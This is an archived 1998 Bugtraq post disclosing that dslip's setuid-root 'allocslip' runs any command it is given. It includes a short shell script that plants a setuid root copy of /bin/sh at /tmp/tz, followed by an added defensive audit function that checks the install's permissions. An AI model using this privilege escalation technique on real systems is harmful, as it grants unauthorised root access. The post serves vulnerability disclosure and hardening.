Bugtraq mailing list archives
dslip package
From: taz () SIMPLENET COM (David Kopstain)
Date: Thu, 9 Jul 1998 01:34:20 -0700
In the README file for the dslip package, it clearly states:

    Those people who are allowed to turn on and off SLIP lines should be
    put in the slip group. NOBODY except user slip should be allowed in
    the slipown group since it effectively allows root access (since the
    dialin/dialout scripts must be run as root).

The package advises to install the program 'allocslip' like so:

    -rwsr-x---   1 root     slipown      9220 Aug  4 11:15 allocslip*

If you follow the instructions, then only users in group slipown can run this program and you're only at _their_ mercy. But if you allow anyone to run this program on your machine, and it's setuid root like advised, then something as easy as this will compromise root.

--- cut ---
#!/bin/sh
cat > /tmp/sg << EOF
#!/bin/sh
cp /bin/sh /tmp/tz
chown root /tmp/tz
chmod 4755 /tmp/tz
EOF
chmod +x /tmp/sg
allocslip /tmp/sg
--- eof ---

allocslip simply follows any command you give it as arg 1. So take the above shell script, run it, then look for your handy root shell at /tmp/tz.

The buffer overflow previously mentioned is of no real concern then since we can already execute whatever we want. And the reason some people can't make this program do exactly what they want (i.e. call system_script() so they can execute whatever they want) is because they must have compiled in the slip option in the networking options of the kernel.

Moral of the story: read the manual. Don't be a dumbshit and install software without reading exactly what you're doing.

-taz
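
A check for the install state the README describes, as an added example that is not part of the original post or the dslip package: it reads an `ls -l` line and an `/etc/group` line and reports when a setuid binary is reachable by users outside the restricted group, or when that group has members other than the one allowed account. The function name, the gid 101 and the account alice are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a setuid install against the README's advice.
# Inputs are text lines (an `ls -l` line, an /etc/group line) so it runs offline.
# $1 ls -l line  $2 /etc/group line  $3 restricted group  $4 sole allowed member
audit_setuid_install() {
    ls_line=$1; group_line=$2; want_group=$3; want_member=$4
    rc=0

    # ls -l fields: mode, link count, owner, group (the rest is unused).
    read -r mode _links owner group _rest <<EOF
$ls_line
EOF
    mode=${mode%[.+@]}   # drop a trailing ACL/SELinux marker if present

    case $mode in
        ???[sS]*) ;;     # setuid bit set: keep checking
        *) echo "ok: not setuid"; return 0 ;;
    esac

    # Users outside the group must have no access at all (mode ends in ---).
    case $mode in
        *---) ;;
        *) echo "FINDING: setuid binary owned by $owner is open to all users ($mode)"; rc=1 ;;
    esac
    [ "$group" = "$want_group" ] ||
        { echo "FINDING: group is $group, expected $want_group"; rc=1; }

    # /etc/group format: name:password:gid:member,member,...
    IFS=: read -r gname _pw _gid members <<EOF
$group_line
EOF
    [ "$gname" = "$want_group" ] ||
        { echo "FINDING: group line is for $gname, not $want_group"; rc=1; }
    old_ifs=$IFS; IFS=,
    for m in $members; do
        [ "$m" = "$want_member" ] ||
            { echo "FINDING: $m is in $want_group (only $want_member belongs there)"; rc=1; }
    done
    IFS=$old_ifs
    return $rc
}

# Constructed inputs: the README's advised mode, plus one extra group member.
audit_setuid_install '-rwsr-x--- 1 root slipown 9220 Aug 4 11:15 allocslip*' \
    'slipown:x:101:slip,alice' slipown slip || :
```

On a live system the two lines would come from `ls -l` on the installed binary and from the slipown entry in `/etc/group`.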